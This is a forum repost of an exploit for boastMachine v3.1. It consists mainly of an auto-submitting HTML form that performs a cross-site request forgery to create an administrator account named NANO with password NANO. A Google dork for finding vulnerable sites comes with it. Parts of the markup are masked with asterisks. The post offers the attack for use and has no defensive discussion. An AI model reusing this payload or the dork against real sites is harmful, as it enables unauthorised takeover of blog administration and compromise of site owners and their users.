:: vBspiders Professional Network :: - boastMachine v3.1 <= CSRF Add Admin Vulnerability

بسم الله الرحمن الرحيم.
السلام عليكم ورحمه الله وبركاته.

كود:

# Exploit Title: boastMachine v3.1 <= CSRF Add Admin Vulnerability

# Date: 28/3/2012

# Author: Dr.NaNo

# Software Link: http://boastology.com/pages/dload.php?id=bmachine-3.1.zip

# Version: 3.1

# Tested on: Linux-Red-Hat

# Google Dork: Powered by boastMachine v3.1

#

########################################################

#                     ~ Exploit ~                      #  

########################################################

 

<html>

<form  ****="nano" action="http://localhost/{PACH}/bmc/admin.php?action=add_user&blog" method="post">

<input type="hidden" ****="action" value="add_user"><br/>

<input type="hidden" ****="do" value="add"><br/>

<input type="hidden" value="NANO" ****="user_login"><br/>

<input type="hidden" value="NANO" ****="user_pass"><br/>

<input type="hidden" value="Administrator" ****="user_****"><br/>

<input type="hidden" value="security@wsecurity.com" ****="user_email"><br/>

<input type="hidden" value="4" ****="blogs[]"><br/>

<input type="hidden" value="4" ****="user_level"><br/>

<input type="hidden" value="Add"><br/>

</form>

******************.nano.submit();</script>

</html>

 

########################################################

#                                                      #

# ~ Greetz : Dr.WEP , JIKO , ( All FriendS ) ~          #

#                                                      #

########################################################

more